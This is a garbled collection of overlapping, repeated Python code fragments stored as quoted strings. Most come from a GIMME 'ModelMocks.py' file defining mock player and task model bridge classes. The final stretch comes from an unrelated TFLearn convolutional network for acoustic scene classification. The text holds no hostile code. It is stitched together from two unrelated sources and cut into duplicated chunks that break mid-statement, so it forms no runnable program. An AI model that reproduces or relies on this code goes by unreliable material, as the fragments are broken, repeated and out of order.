"CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId,",
"self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight,",
"self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self,",
"self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId,",
"playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self,",
"minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def",
"range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self,",
"self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration,",
"setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics",
"setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks",
"len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId,",
"minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)]",
"self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers = len(players) def",
"return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def",
"= characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group):",
"minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight,",
"self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players =",
"preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self,",
"self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i)",
"self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks =",
"description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in",
"profileWeight): self.id = id self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile",
"= id self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight =",
"def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description",
"def __init__(self, players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name,",
"self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def getPlayerRealPreferences(self, playerId):",
"currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id self.name =",
"registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility,",
"def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def",
"pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class",
"self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility,",
"class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id =",
"= name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized()",
"= newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId):",
"def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description,",
"from GIMMECore import TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id,",
"return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self,",
"= PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset()",
"= None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):",
"= blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i",
"class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self,",
"playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def",
"len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId,",
"pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id self.name = name",
"def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group =",
"return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics):",
"playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def",
"preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self,",
"def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId):",
"id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id",
"= len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] =",
"profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility = minRequiredAbility",
"difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self):",
"def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId,",
"self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self,",
"self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId,",
"characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self,",
"taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration",
"getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return",
"currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id self.name = name self.pastModelIncreasesGrid",
"getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return",
"__init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id =",
"= tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight,",
"return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def",
"tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def getPlayerRealPreferences(self,",
"difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility = minRequiredAbility self.profile =",
"= TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for",
"self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate =",
"def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId):",
"taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight",
"group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self,",
"self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self,",
"playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def",
"= profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge):",
"minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration",
"getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def",
"taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers =",
"def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name",
"= minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks)",
"profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks",
"currState self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst =",
"playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState",
"return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def",
"= description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight =",
"i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState",
"id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences",
"getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers",
"self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge):",
"setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate",
"self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight",
"__init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility,",
"profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def",
"blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in",
"profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return",
"for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return",
"None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id",
"tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile,",
"taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate",
"getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return",
"TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid,",
"newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return",
"def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile =",
"id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description = description",
"minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def",
"def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId):",
"def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases,",
"resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState):",
"return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId):",
"def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks =",
"<reponame>pedro19v/GIMME<filename>examples/ModelMocks.py<gh_stars>0 from GIMMECore import TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self,",
"self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self,",
"getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def",
"description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight",
"self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self,",
"self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences =",
"preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id,",
"preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self,",
"realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId):",
"= profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks",
"self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId,",
"newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def",
"name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate",
"playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId,",
"def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id",
"= id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() #",
"playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile",
"= realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile,",
"self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId]",
"minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self,",
"self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState",
"self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks ="
] |
[
"#creating the CNN model as per the architecture followed with 4-conv and pooling",
"optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model,",
"64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu')",
"modules import os import numpy as np import tensorflow as tf import tflearn",
"32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu')",
"the model in the DNN/full folder, 3 files will be created for each",
"\"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier #saving",
"avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy',",
"model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}),",
"= tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be",
"i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy",
"__init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model as per the architecture",
"activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model",
"Y_test): self.ans = [] count = 0 for i in range(len(X_test)): self.pr =",
"pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32,",
"each model return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans = []",
"= fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model =",
"X_train, Y_train, X_val, Y_val): #training the created model with data from the user",
"\", (count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier #saving the softmax outputs",
"create_1ConvModel(self): #creating the CNN model as per the architecture followed with 4-conv and",
"{'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model')",
"libraries and modules import os import numpy as np import tensorflow as tf",
"activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu')",
"DNN/full folder, 3 files will be created for each model return model def",
"self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to",
"be created for each model return model def predict_test_data(self, arg, model, X_test, Y_test):",
"files will be created for each model return model def predict_test_data(self, arg, model,",
"predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count = 0 for i",
"#importing required libraries and modules import os import numpy as np import tensorflow",
"for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test",
"architecture followed with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1],",
"classifier #saving the softmax outputs for using them later for calculating the ensemble",
"= input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet",
"5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet",
"number of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val},",
"#calculating test accuracy for each classifier #saving the softmax outputs for using them",
"X_val, Y_val): #training the created model with data from the user #here stochastic",
"= conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet",
"self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet,",
"be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet,",
"count = 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])):",
"= max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3)",
"model as per the architecture followed with 4-conv and pooling layers self.convnet =",
"not too high; minibatch_size=1 self.epoch = 10 #set the number of epochs model.fit({'input'",
"accuracy for each classifier #saving the softmax outputs for using them later for",
"= max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3)",
"can be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet =",
"X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet')",
"= [] count = 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr)",
"(count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier #saving the softmax outputs for",
"name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet =",
"#here stochastic learning is deployed since the input data is not too high;",
"self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet,",
"<reponame>chatdip98/Acoustic-Scene-Classification #----convolutional neural network for classification------ #importing required libraries and modules import os",
"3 files will be created for each model return model def predict_test_data(self, arg,",
"def predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count = 0 for",
"max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet",
"arg, model, X_test, Y_test): self.ans = [] count = 0 for i in",
"self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet",
"validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in",
"self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu')",
"in the DNN/full folder, 3 files will be created for each model return",
"'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model as per",
"import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize = 'full'",
"10 #set the number of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch,",
"model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating",
"softmax outputs for using them later for calculating the ensemble accuracy np.save('test_prediction/full/'+arg+'.npy', np.array(self.ans))",
"#training the created model with data from the user #here stochastic learning is",
"self.epoch = 10 #set the number of epochs model.fit({'input' : X_train}, {'targets' :",
"activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet =",
"train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the created model with data",
"CNN(): datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN",
"input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet =",
"input data is not too high; minibatch_size=1 self.epoch = 10 #set the number",
"data is not too high; minibatch_size=1 self.epoch = 10 #set the number of",
"3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet =",
"to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01,",
"= regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self,",
"Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier #saving the",
"5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet",
"each classifier #saving the softmax outputs for using them later for calculating the",
"#set the number of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input'",
"3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet =",
"tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout,",
"= 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model as",
"folder, 3 files will be created for each model return model def predict_test_data(self,",
"tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from",
"for classification------ #importing required libraries and modules import os import numpy as np",
"as per the architecture followed with 4-conv and pooling layers self.convnet = input_data(shape=[None,",
"max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet",
